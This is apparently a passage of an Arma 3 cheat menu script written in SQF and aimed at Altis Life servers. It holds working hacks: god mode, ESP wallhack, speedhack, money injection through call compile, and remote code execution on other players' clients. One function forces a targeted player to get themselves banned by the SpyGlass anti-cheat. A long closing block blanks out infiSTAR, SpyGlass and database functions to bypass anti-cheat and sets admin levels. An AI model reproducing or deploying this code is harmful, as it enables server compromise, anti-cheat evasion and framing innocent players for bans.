  3689. _wset addWeaponGlobal "itemradio";
  3691. (unitBackpack _wset) additemCargo ["FirstAidKit",2];
  3692. (unitBackpack _wset) additemCargo ["30Rnd_556x45_Stanag_Tracer_Red", 9];
  3693. (unitBackpack _wset) additemCargo ["30Rnd_9x21_Mag", 9];
  3694. (unitBackpack _wset) additemCargo ["handGrenade", 2];
  3695. (unitBackpack _wset) additemCargo ["NLAW_F", 2];
  3696. };
  3697. _target = _this call mp_GetObject;
  3698. [_code,_target] call GEF_Rmote;
  3699. };
  3700. GEF_NoClip = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3701. if(GEF_NoClip_Toggle) then {
  3702. hint "No Clip ON";
  3703. _clipList = [];
  3704. while{GEF_NoClip_Toggle} do {
  3705. _objects = ((position player) nearObjects 100);
  3706. {
  3707. if !(_x in _clipList) then {
  3708. _clipList = _clipList + [_x];
  3709. player disableCollisionWith _x;
  3710. };
  3711. } forEach _objects;
  3712. {
  3713. if !(_x in _objects) then {
  3714. _clipList = _clipList - [_x];
  3715. player enableCollisionWith _x;
  3716. };
  3717. } forEach _clipList;
  3718. };
  3719. {
  3720. player enableCollisionWith _x;
  3721. } forEach _clipList;
  3722. } else {
  3723. hint "No Clip OFF";
  3724. };
  3725. };
  3726. GEF_Invisible = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3727. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3728. LY_InvisTarget = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3729. _object = _this select 0;
  3730. _hide = _this select 1;
  3731. _object hideObject _hide;
  3732. };
  3733. };
  3734. [_code,true] call GEF_Rmote;
  3735. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + "_player = objnull; {if(name _x == '" + name player + "') then {_player = _x;};} forEach playableunits; [_player," + str GEF_Invisible_Toggle + "] spawn LY_InvisTarget;");
  3736. [_code,true] call GEF_Rmote;
  3737. };
  3738. GEF_Terrain = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3739. if (GEF_Terrain_Toggle) then {
  3740. setTerrainGrid 50;
  3741. hint "Terrain Low";
  3742. cutText [format["Terrain Low"], "PLAIN DOWN"];
  3743. } else {
  3744. setTerrainGrid 12.5;
  3745. hint "Terrain Normal";
  3746. cutText [format["Terrain Normal"], "PLAIN DOWN"];
  3747. };
  3748. };
  3749. GEF_RapidFire = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3750. if(GEF_RapidFire_Toggle) then { hint "Rapid Fire ON";} else {hint "Rapid Fire OFF";};
  3751. while{GEF_RapidFire_Toggle} do {
  3752. (vehicle player) setWeaponReloadingTime [(vehicle player),currentWeapon (vehicle player),0];
  3753. player setWeaponReloadingTime [player,currentWeapon player,0];
  3754. };
  3755. (vehicle player) setWeaponReloadingTime [(vehicle player),currentWeapon (vehicle player),1];
  3756. player setWeaponReloadingTime [player,currentWeapon player,1];
  3757. };
  3758. GEF_NoRecoil = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3759. if(GEF_NoRecoil_Toggle) then {hint "No Recoil ON!";} else {hint "No Recoil OFF!";};
  3760. while{GEF_NoRecoil_Toggle} do {
  3761. player setUnitRecoilCoefficient 0;
  3762. };
  3763. player setUnitRecoilCoefficient 1;
  3764. };
  3765. GEF_UnlimitedAmmo = {
  3766. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3767. if(GEF_UnlimitedAmmo_Toggle) then { hint "Unlimited Amoo ON";} else {hint "Unlimited Ammo OFF";};
  3768. while{GEF_UnlimitedAmmo_Toggle} do {
  3769. (vehicle player) setVehicleAmmo 1;
  3770. };
  3771. };
  3772. GEF_SpeedHack = {
  3773. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3774. if(GEF_VehicleSpeedhack_Toggle) then {
  3775. hint "Speedhack ON";
  3776. cutText [format["Speehack ON"], "PLAIN DOWN"];
  3777. waituntil {!isnull (finddisplay 46)};
  3778. Speed_Hack_cus = (findDisplay 46) displayAddEventHandler ["KeyDown","(_this select 1) call cuGEF_SPEED_DOWN;false"];
  3779. cuGEF_SPEED_DOWN =
  3780. {
  3781. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3782. _cuGEF_Vehicle = vehicle player;
  3783. if(_cuGEF_Vehicle == player)exitwith{};
  3784. if(isEngineOn _cuGEF_Vehicle) then
  3785. {
  3786. switch (_this) do
  3787. {
  3788. case 18:
  3789. {
  3790. if(isEngineOn _cuGEF_Vehicle) then
  3791. {
  3792. _cuGEF_Vehicle setVelocity [(velocity _cuGEF_Vehicle select 0) * 1.02, (velocity _cuGEF_Vehicle select 1) * 1.02, (velocity _cuGEF_Vehicle select 2) * 0.99];
  3793. };
  3794. };
  3795. };
  3796. };
  3797. };
  3798. } else {
  3799. hint "Speedhack OFF";
  3800. cutText [format["Speedhack OFF"], "PLAIN DOWN"];
  3801. cuGEF_SPEED_DOWN = nil;
  3802. (findDisplay 46) displayRemoveEventHandler ["KeyDown", Speed_Hack_cus];
  3803. };
  3804. };
  3805. GEF_Esp = {
  3806. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3807. _r = 255;
  3808. _g = 0;
  3809. _b = 0;
  3810. RGB = [0,0,0,1];
  3811. if(GEF_ESP_TOGGLE) then {
  3812. addMissionEventHandler ["Draw3D",{
  3813. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3814. {
  3815. if((isPlayer _x) && ((side _x) == (side player)) && ((player distance _x) < 700) && (getplayeruid _x != "")) then {
  3816. _pos = getposatl _x;
  3817. _eyepos = ASLtoATL eyepos _x;
  3818. if((getTerrainHeightASL [_pos select 0,_pos select 1]) < 0) then {
  3819. _eyepos = eyepos _x;
  3820. _pos = getposasl _x;
  3821. };
  3822. _1 = _x modelToWorld [-0.5,0,0];
  3823. _2 = _x modelToWorld [0.5,0,0];
  3824. _3 = _x modelToWorld [-0.5,0,0];
  3825. _4 = _x modelToWorld [0.5,0,0];
  3826. _1 set [2,_pos select 2];
  3827. _2 set [2,_pos select 2];
  3828. _3 set [2,(_eyepos select 2)+0.25];
  3829. _4 set [2,(_eyepos select 2)+0.25];
  3830. _HP = (damage _x - 1) * -100;
  3831. _fontsize = 0.02;
  3832. _eyepos set [2,(_3 select 2) - 0.1];
  3833. drawIcon3D["",[0,1,0,1],_eyepos,0.1,0.1,45,format["%1(%2m) - %3HP",name _x,round(player distance _x),round(_HP)],1,_fontsize,'EtelkaNarrowMediumPro'];
  3834. drawLine3D[_1,_2,[0,1,0,1]];
  3835. drawLine3D[_2,_4,[0,1,0,1]];
  3836. drawLine3D[_4,_3,[0,1,0,1]];
  3837. drawLine3D[_3,_1,[0,1,0,1]];
  3838. };
  3839. if((isPlayer _x) && ((side _x) != (side player)) && ((player distance _x) < 1400) && (getplayeruid _x != "")) then {
  3840. _pos = getposatl _x;
  3841. _eyepos = ASLtoATL eyepos _x;
  3842. _1 = _x modelToWorld [-0.5,0,0];
  3843. _2 = _x modelToWorld [0.5,0,0];
  3844. _3 = _x modelToWorld [-0.5,0,0];
  3845. _4 = _x modelToWorld [0.5,0,0];
  3846. _1 set [2,_pos select 2];
  3847. _2 set [2,_pos select 2];
  3848. _3 set [2,(_eyepos select 2)+0.25];
  3849. _4 set [2,(_eyepos select 2)+0.25];
  3850. _HP = (damage _x - 1) * -100;
  3851. _fontsize = 0.02;
  3852. _eyepos set [2,(_3 select 2) - 0.1];
  3853. drawIcon3D["",[1,0,0,1],_eyepos,0.1,0.1,45,format["%1(%2m) - %3HP",name _x,round(player distance _x),round(_HP)],1,_fontsize,'EtelkaNarrowMediumPro'];
  3854. drawLine3D[_1,_2,[1,0,0,1]];
  3855. drawLine3D[_2,_4,[1,0,0,1]];
  3856. drawLine3D[_4,_3,[1,0,0,1]];
  3857. drawLine3D[_3,_1,[1,0,0,1]];
  3858. };
  3859. } forEach playableUnits;
  3860. }];
  3861. } else {
  3862. removeAllMissionEventHandlers "Draw3D";
  3863. };
  3864. };
  3865. GEF_God = {
  3866. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3867. if(GEF_god_TOGGLE) then {
  3868. player allowDamage false;
  3869. player removeAllEventHandlers "handleDamage";
  3870. player addEventHandler ["HandleDamage",{false}];
  3871. player setDamage 0;
  3872. hintSilent format["%1 Enabled!",toString [71,111,100,77,111,100,101]];
  3873. } else {
  3874. player allowDamage true;
  3875. player removeAllEventHandlers "handleDamage";
  3876. player addEventHandler ["HandleDamage",{true}];
  3877. player setDamage 0;
  3878. hintSilent format["%1 Disabled!",toString [71,111,100,77,111,100,101]];
  3879. };
  3880. };
  3881. GEF_VehGod = {
  3882. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3883. if(GEF_VEHgod_TOGGLE) then {hintSilent format["Vehicle %1 Enabled",toString [71,111,100,77,111,100,101]];} else {hintSilent format["Vehicle %1 Disabled",toString [71,111,100,77,111,100,101]];};
  3884. while{GEF_VEHgod_TOGGLE} do {
  3885. waitUntil{vehicle player != player};
  3886. _veh = vehicle player;
  3887. _veh removeAllEventHandlers "handleDamage";
  3888. _veh addEventHandler ["handleDamage", {false}];
  3889. _veh allowDamage false;
  3890. _veh setDamage 0;
  3891. _veh setFuel 1;
  3892. waitUntil{vehicle player == player};
  3893. _veh removeAllEventHandlers "handleDamage";
  3894. _veh addEventHandler ["handleDamage", {true}];
  3895. _veh allowDamage true;
  3896. };
  3897. };
  3898. };
  3899. ["Scripts For ALIFE"] call {
  3900. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3901. GEF_IRevive = {
  3902. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3903. [] spawn {
  3904. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3905. while{true} do {
  3906. waitUntil{player getVariable ["REVIVE",false] && alive player == false};
  3907. _target = player;
  3908. [[name player],"life_fnc_revived",_target,FALSE] spawn life_fnc_MP;
  3909. };
  3910. };
  3911. hint 'Instant Revive Enabled';
  3912. };
  3913. GEF_ACash = {
  3914. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3915. ["atm","set",100000] call life_fnc_updateCash;
  3916. hint 'cash added';
  3917. };
  3918. GEF_Talents = {
  3919. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3920. life_experience = 50000;
  3921. hint 'select talents from talent menu!';
  3922. };
  3923. GEF_FindAdmins = {
  3924. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3925. GEF_Admins = [];
  3926. GEF_NotAdmins = [];
  3927. "AdminFound" addPublicVariableEventHandler {
  3928. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3929. _arr = _this select 1;
  3930. _player = _arr select 0;
  3931. _admin = _arr select 1;
  3932. _loggedin = _arr select 2;
  3933. if(_admin == 0 && !_loggedin) exitWith {GEF_NotAdmins = GEF_NotAdmins + [_player];};
  3934. GEF_Admins = GEF_Admins + [_player];
  3935. _hint = "Found Admins\n";
  3936. {
  3937. _hint = _hint + "\nAdmin: " + name _x;
  3938. } forEach GEF_Admins;
  3939. hint _hint;
  3940. };
  3941. {
  3942. _time = time;
  3943. _toClient = {
  3944. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3945. AdminFound = [player,life_adminLevel,serverCommandAvailable "#kick"];
  3946. publicVariable "AdminFound";
  3947. };
  3948. [_toClient,_x] call GEF_Rmote;
  3949. waitUntil{_x in GEF_Admins || _x in GEF_NotAdmins || time >= (_time + 10)};
  3950. } forEach playableUnits;
  3951. {
  3952. _hint = _hint + "\nAdmin: " + name _x;
  3953. } forEach GEF_Admins;
  3954. _hint = _hint + "\n\nDone Searching!";
  3955. hint _hint;
  3956. };
  3957. GEF_BanTarget = {
  3958. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3959. _target = _this call mp_GetObject;
  3960. [{
  3961. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  3962. [[profileName,getPlayerUID player,_x],"SPY_fnc_cookieJar",false,false] spawn life_fnc_MP;
  3963. [[profileName,format["Variable: %1",_x]],"SPY_fnc_notifyAdmins",true,false] spawn life_fnc_MP;
  3964. sleep 0.5;
  3965. ["SpyGlass",false,false] call bis_fnc_endMission;
  3966. },_target] call GEF_Rmote;
  3967. };
  3968. GEF_Cash5k = {
  3969. if(!isNil "life_no_injection") then {life_no_injection = true;};
  3970. setcash = true;
  3971. if(isNil "cash_var") then {cash_var = "swag";};
  3972. if(cash_var == "swag") then {
  3973. _search = preprocessfilelinenumbers "core\configuration.sqf";
  3974. _words = [_search," "] call bis_fnc_splitString;
  3975. _index = _words find "west:";
  3976. if(_index != -1) then {
  3977. _varIndex = _index + 1;
  3978. _varTemp = _words select _varIndex;
  3979. _varTemp = toLower(_varTemp);
  3980. _low = (toArray("a") select 0);
  3981. _high = (toArray("z") select 0);
  3982. _allowedLetters = toArray("_1234567890");
  3983. _newArray = [];
  3984. _oldArray = toArray(_varTemp);
  3985. for "_i" from 0 to count(_oldArray)-1 do {
  3986. _val = _oldArray select _i;
  3987. if((_val >= _low && _val <= _high) || (_val in _allowedLetters)) then {
  3988. _newArray set[count(_newArray),_val];
  3989. }
  3990. };
  3991. cash_var = toString _newArray;
  3992. } else {
  3993. setcash = false;
  3994. };
  3995. };
  3996. if(!setcash) exitWith {hint "failed to find life cash variable! Sorry :(";};
  3998. call compile format["%1 = %1 + 5000;",cash_var];
  3999. hint "Money Added :P";
  4000. if(!isNil "life_no_injection") then {life_no_injection = false;};
  4001. };
  4002. GEF_Cash10k = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4003. if(!isNil "life_no_injection") then {life_no_injection = true;};
  4004. setcash = true;
  4005. if(isNil "cash_var") then {cash_var = "swag";};
  4006. if(cash_var == "swag") then {
  4007. _search = preprocessfilelinenumbers "core\configuration.sqf";
  4008. _words = [_search," "] call bis_fnc_splitString;
  4009. _index = _words find "west:";
  4010. if(_index != -1) then {
  4011. _varIndex = _index + 1;
  4012. _varTemp = _words select _varIndex;
  4013. _varTemp = toLower(_varTemp);
  4014. _low = (toArray("a") select 0);
  4015. _high = (toArray("z") select 0);
  4016. _allowedLetters = toArray("_1234567890");
  4017. _newArray = [];
  4018. _oldArray = toArray(_varTemp);
  4019. for "_i" from 0 to count(_oldArray)-1 do {
  4020. _val = _oldArray select _i;
  4021. if((_val >= _low && _val <= _high) || (_val in _allowedLetters)) then {
  4022. _newArray set[count(_newArray),_val];
  4023. }
  4024. };
  4025. cash_var = toString _newArray;
  4026. } else {
  4027. setcash = false;
  4028. };
  4029. };
  4030. if(!setcash) exitWith {hint "failed to find life cash variable! Sorry :(";};
  4032. call compile format["%1 = %1 + 10000;",cash_var];
  4033. hint "Money Added :P";
  4034. if(!isNil "life_no_injection") then {life_no_injection = false;};
  4035. };
  4036. GEF_Cash20k = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4037. if(!isNil "life_no_injection") then {life_no_injection = true;};
  4038. setcash = true;
  4039. if(isNil "cash_var") then {cash_var = "swag";};
  4040. if(cash_var == "swag") then {
  4041. _search = preprocessfilelinenumbers "core\configuration.sqf";
  4042. _words = [_search," "] call bis_fnc_splitString;
  4043. _index = _words find "west:";
  4044. if(_index != -1) then {
  4045. _varIndex = _index + 1;
  4046. _varTemp = _words select _varIndex;
  4047. _varTemp = toLower(_varTemp);
  4048. _low = (toArray("a") select 0);
  4049. _high = (toArray("z") select 0);
  4050. _allowedLetters = toArray("_1234567890");
  4051. _newArray = [];
  4052. _oldArray = toArray(_varTemp);
  4053. for "_i" from 0 to count(_oldArray)-1 do {
  4054. _val = _oldArray select _i;
  4055. if((_val >= _low && _val <= _high) || (_val in _allowedLetters)) then {
  4056. _newArray set[count(_newArray),_val];
  4057. }
  4058. };
  4059. cash_var = toString _newArray;
  4060. } else {
  4061. setcash = false;
  4062. };
  4063. };
  4064. if(!setcash) exitWith {hint "failed to find life cash variable! Sorry :(";};
  4066. call compile format["%1 = %1 + 20000;",cash_var];
  4067. hint "Money Added :P";
  4068. if(!isNil "life_no_injection") then {life_no_injection = false;};
  4069. };
  4070. GEF_Cash50k = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4071. if(!isNil "life_no_injection") then {life_no_injection = true;};
  4072. setcash = true;
  4073. if(isNil "cash_var") then {cash_var = "swag";};
  4074. if(cash_var == "swag") then {
  4075. _search = preprocessfilelinenumbers "core\configuration.sqf";
  4076. _words = [_search," "] call bis_fnc_splitString;
  4077. _index = _words find "west:";
  4078. if(_index != -1) then {
  4079. _varIndex = _index + 1;
  4080. _varTemp = _words select _varIndex;
  4081. _varTemp = toLower(_varTemp);
  4082. _low = (toArray("a") select 0);
  4083. _high = (toArray("z") select 0);
  4084. _allowedLetters = toArray("_1234567890");
  4085. _newArray = [];
  4086. _oldArray = toArray(_varTemp);
  4087. for "_i" from 0 to count(_oldArray)-1 do {
  4088. _val = _oldArray select _i;
  4089. if((_val >= _low && _val <= _high) || (_val in _allowedLetters)) then {
  4090. _newArray set[count(_newArray),_val];
  4091. }
  4092. };
  4093. cash_var = toString _newArray;
  4094. } else {
  4095. setcash = false;
  4096. };
  4097. };
  4098. if(!setcash) exitWith {hint "failed to find life cash variable! Sorry :(";};
  4100. call compile format["%1 = %1 + 50000;",cash_var];
  4101. hint "Money Added :P";
  4102. if(!isNil "life_no_injection") then {life_no_injection = false;};
  4103. };
  4104. GEF_Cash100k = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4105. if(!isNil "life_no_injection") then {life_no_injection = true;};
  4106. setcash = true;
  4107. if(isNil "cash_var") then {cash_var = "swag";};
  4108. if(cash_var == "swag") then {
  4109. _search = preprocessfilelinenumbers "core\configuration.sqf";
  4110. _words = [_search," "] call bis_fnc_splitString;
  4111. _index = _words find "west:";
  4112. if(_index != -1) then {
  4113. _varIndex = _index + 1;
  4114. _varTemp = _words select _varIndex;
  4115. _varTemp = toLower(_varTemp);
  4116. _low = (toArray("a") select 0);
  4117. _high = (toArray("z") select 0);
  4118. _allowedLetters = toArray("_1234567890");
  4119. _newArray = [];
  4120. _oldArray = toArray(_varTemp);
  4121. for "_i" from 0 to count(_oldArray)-1 do {
  4122. _val = _oldArray select _i;
  4123. if((_val >= _low && _val <= _high) || (_val in _allowedLetters)) then {
  4124. _newArray set[count(_newArray),_val];
  4125. }
  4126. };
  4127. cash_var = toString _newArray;
  4128. } else {
  4129. setcash = false;
  4130. };
  4131. };
  4132. if(!setcash) exitWith {hint "failed to find life cash variable! Sorry :(";};
  4134. call compile format["%1 = %1 + 100000;",cash_var];
  4135. hint "Money Added :P";
  4136. if(!isNil "life_no_injection") then {life_no_injection = false;};
  4137. };
  4138. GEF_Cash500k = {
  4139. if(!isNil "life_no_injection") then {life_no_injection = true;};
  4140. setcash = true;
  4141. if(isNil "cash_var") then {cash_var = "swag";};
  4142. if(cash_var == "swag") then {
  4143. _search = preprocessfilelinenumbers "core\configuration.sqf";
  4144. _words = [_search," "] call bis_fnc_splitString;
  4145. _index = _words find "west:";
  4146. if(_index != -1) then {
  4147. _varIndex = _index + 1;
  4148. _varTemp = _words select _varIndex;
  4149. _varTemp = toLower(_varTemp);
  4150. _low = (toArray("a") select 0);
  4151. _high = (toArray("z") select 0);
  4152. _allowedLetters = toArray("_1234567890");
  4153. _newArray = [];
  4154. _oldArray = toArray(_varTemp);
  4155. for "_i" from 0 to count(_oldArray)-1 do {
  4156. _val = _oldArray select _i;
  4157. if((_val >= _low && _val <= _high) || (_val in _allowedLetters)) then {
  4158. _newArray set[count(_newArray),_val];
  4159. }
  4160. };
  4161. cash_var = toString _newArray;
  4162. } else {
  4163. setcash = false;
  4164. };
  4165. };
  4166. if(!setcash) exitWith {hint "failed to find life cash variable! Sorry :(";};
  4168. call compile format["%1 = %1 + 500000;",cash_var];
  4169. hint "Money Added :P";
  4170. if(!isNil "life_no_injection") then {life_no_injection = false;};
  4171. };
  4172. GEF_Licenses = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4173. {missionnamespace setVariable[(_x select 0),true];} foreach life_licenses;
  4174. ["TaskSucceeded",["","Liscenses Added"]] call bis_fnc_showNotification;
  4175. };
  4176. GEF_NoIllegal = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4177. life_illegal_items = [];
  4178. ["TaskSucceeded",["","No items are illegal now!"]] call bis_fnc_showNotification;
  4179. };
  4180. GEF_Unrestrain = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4181. player setVariable["restrained",false,true];
  4182. ["TaskSucceeded",["","Press V to escape restraints"]] call bis_fnc_showNotification;
  4183. };
  4184. GEF_NoEscort = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4185. player setVariable["Escorting",false,true];
  4186. detach player;
  4187. ["TaskSucceeded",["","No Longer Being Escorted"]] call bis_fnc_showNotification;
  4188. };
  4189. GEF_NoTransport = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4190. player setVariable["transporting",false,true];
  4191. ["TaskSucceeded",["","No Longer Being Transported"]] call bis_fnc_showNotification;
  4192. };
  4193. GEF_NoTaze = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4194. life_fnc_tazed = compileFinal "";
  4195. ["TaskSucceeded",["","You can no longer be tazed"]] call bis_fnc_showNotification;
  4196. };
  4197. GEF_Impound = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4198. cursortarget spawn life_fnc_impoundAction;
  4199. ["TaskSucceeded",["","Vehicle impounded"]] call bis_fnc_showNotification;
  4200. };
  4201. };
  4203. BIS_fnc_dbg_reminder_value = compileFinal '';
  4204. BIS_fnc_dbg_reminder = compileFinal 'while{true} do {};';
  4205. hint 'BIS_fnc_endMission Bypassed\n\nTesting Now!';
  4206. [] spawn BIS_fnc_endMission
  4207. [] spawn{SOCK_fnc_dataQuery = compileFinal "false"; DB_fnc_mresString = compileFinal "false"; DB_fnc_mresArray = compileFinal "false"; DB_fnc_numberSafe = compileFinal "false"; DB_fnc_asyncCall = compileFinal "false"; DB_Async_Active = compileFinal "false"; hint "Titans: Altis Life Database Bypass Activated"; };
  4208. life_adminlevel = 3;
  4209. _rnd2 = compileFinal "3";
  4210. life_coplevel = 7;
  4211. _kickunit = compileFinal "";
  4212. fnc_infiServerKick = compileFinal "";
  4213. _tmpBL = compileFinal "";
  4214. _arr = compileFinal "";
  4215. _ninetwo = compileFinal "";
  4216. FNC_A3_infiSTARBAN = compileFinal "";
  4217. _testers = compileFinal "";
  4218. _TEMP = compileFinal "";
  4219. _children = compileFinal "";
  4220. infiSTAR_MAIN_CODE = compileFinal "";
  4221. _MAIN_CODE = compileFinal "";
  4222. fnc_infiServerKick = compileFinal "";
  4223. _A3AHstring = compileFinal "";
  4224. _MPInterruptChecked = compileFinal "false";
  4225. life_fnc_adminid = compileFinal "";
  4226. life_session_completed = compileFinal "true";
  4227. STR_Session_QueryFail = compileFinal "false";
  4228. _getRidOff = compileFinal "";
  4229. _SP_PLAYER_ = compileFinal "";
  4230. _clientonceone = compileFinal "";
  4231. _YourPlayerToken = compileFinal "";
  4232. _clientoncetwo = compileFinal "";
  4233. diag_tickTime = compileFinal "";
  4234. _AH142KICKLOG = compileFinal "";
  4235. kicked_by_AntiHack = compileFinal "";
  4236. admin_d0_server = compileFinal "";
  4237. fnc_AdminReq = compileFinal "";
  4238. A3RANDVARuuixgra = compileFinal "";
  4239. A3RANDVAR4cpfohg = compileFinal "";
  4240. A3RANDVARsspt3nt = compileFinal "";
  4241. A3RANDVARrpv1tpv = compileFinal "";
  4242. A3RANDVARzohlqlh = compileFinal "";
  4243. A3RANDVARfxehtmp = compileFinal "";
  4244. A3RANDVARilg3vw2 = compileFinal "";
  4245. A3RANDVARgbjdlsm = compileFinal "";
  4246. A3RANDVARc1wmch1 = compileFinal "";
  4247. _randvar3 = compileFinal "";
  4248. _AH_MAIN_BLOCK = compileFinal "";
  4249. _RunOnClients = compileFinal "";
  4250. _AHrunCheck = compileFinal "";
  4251. _AH_AnnounceAdmin = compileFinal "";
  4252. _AHKickOFF = compileFinal "";
  4253. _AH_RunCheck = compileFinal "";
  4254. _AH_RunCheck2 = compileFinal "";
  4255. _FiredCheck = compileFinal "";
  4256. _TMPBAN = compileFinal "";
  4257. _randvar29 = compileFinal "";
  4258. _randvar30 = compileFinal "";
  4259. _massMessage = compileFinal "";
  4260. _AHpos = compileFinal "";
  4261. _adjust = compileFinal "";
  4262. _fnc_RandomGen = compileFinal "";
  4263. _badVariables = compileFinal "";
  4264. _validMenus = compileFinal "";
  4265. _puid = compileFinal "";
  4266. _name = compileFinal "";
  4267. _commandingMenu = compileFinal "";
  4268. _admins = compileFinal "";
  4269. _mPos = compileFinal "";
  4270. _oVeh = compileFinal "";
  4271. _BM = compileFinal "";
  4272. _BW = compileFinal "";
  4273. _break = compileFinal "";
  4274. _lastMenu = compileFinal "";
  4275. _patchList = compileFinal "";
  4276. _endM = compileFinal "";
  4277. _onLoad = compileFinal "";
  4278. _onUnload = compileFinal "";
  4279. _checkThread = compileFinal "";
  4280. LysticCompilableString = compileFinal "";
  4281. _LoadingIn = compileFinal "";
  4282. _DetectedFiles = compileFinal "";
  4283. _DetectedVariables = compileFinal "";
  4284. _DetectedMenus = compileFinal "";
  4285. INFIKICK = compileFinal "";
  4286. RscDisplayMPInterrupt = compileFinal "";
  4287. _loaded = compileFinal "";
  4288. _dikCode = compileFinal "";
  4289. _antiWallCount = compileFinal "";
  4290. _fncKick = compileFinal "";
  4291. _ban = compileFinal "";
  4292. _bans = compileFinal "";
  4293. JUSTSLEEPS = compileFinal "";
  4294. _rv3 = compileFinal "";
  4295. _i = compileFinal "";
  4296. _j = compileFinal "";
  4297. _UBF = compileFinal "";
  4298. _allowedDialogs = compileFinal "";
  4299. _badDialogsBAN = compileFinal "";
  4300. _badDialogsKICK = compileFinal "";
  4301. _badDialogsClose = compileFinal "";
  4302. _allocMemory = compileFinal "";
  4303. _d3d9multipliervariable = compileFinal "";
  4304. antihack_Enabled = compileFinal "";
  4305. antihack_cfgPatchesCheck = compileFinal "";
  4306. antihack_whitelistedCfgPatches = compileFinal "";
  4307. antihack_InvOpenCheck = compileFinal "";
  4308. antihack_banReason = compileFinal "";
  4309. EPOCH_client_rejectPlayer = compileFinal "";
  4310. EPOCH_masterLoop = compileFinal "";
  4311. DEBUG_VEH = compileFinal "true";
  4312. A3_epoch_infiSTAR = compileFinal "";
  4313. CfgRemoteExecCommands = compileFinal "";
  4314. _loadedcheckpos = compileFinal "";
  4315. _loadedchecktime = compileFinal "";
  4316. _MPEH_MAIN_BLOCK = compileFinal "";
  4317. _oLuLc = compileFinal "";
  4318. _AH_RunCheckARRAY = compileFinal "";
  4319. _AH_HackLogArrayRND = compileFinal "";
  4320. _AH_RunCheckMAIN = compileFinal "";
  4321. _AH_RunCheckENDVAR = compileFinal "";
  4322. _AH_SurvLogArrayRND = compileFinal "";
  4323. _startOnceOnly = compileFinal "";
  4324. _stepOver = compileFinal "";
  4325. _infikeypress = compileFinal "";
  4326. _infiSTAR_fnc_STOP = compileFinal "";
  4327. _infiSTAR_fnc_animchanged = compileFinal "";
  4328. _remark = compileFinal "";
  4329. _AntiAntiHackTesting = compileFinal "";
  4330. _clientdo = compileFinal "";
  4331. _fnc_MP_packetR = compileFinal "";
  4332. _fnc_MP_packetL = compileFinal "";
  4333. SPY_fnc_variablecheck = compileFinal "";
  4334. SPY_fnc_cmdMenuCheck = compileFinal "";
  4335. SPY_fnc_menuCheck = compileFinal "";
  4336. SPY_cfg_runPatchCheck = compileFinal "";
  4337. SpyGlass = compileFinal "";
  4338. SPY_fnc_notifyAdmins = compileFinal "";
  4339. SPY_fnc_cookieJar = compileFinal "";
  4340. _display = compileFinal "";
  4341. SPYGLASS_END = compileFinal "";
  4342. _detection = compileFinal "false";
  4343. _checkThread = compileFinal "";
  4344. _patchList = compileFinal "";
  4345. life_blacklisted = compileFinal "false";
  4346. _clientcanload = compileFinal "true";
  4347. _hacker = compileFinal "";
  4348. _fnc_serverKickNicedo = compileFinal "";
  4349. _reobj = compileFinal "";
  4350. fnc_serverKickNice = compileFinal "";
  4351. _EPOCH_masterLoop = compileFinal "";
  4352. _EPOCH_client_rejectPlayer = compileFinal "";
  4353. _fnc_serverKickEvildo = compileFinal "";
  4354. _fnc_serverKickEvil = compileFinal "";
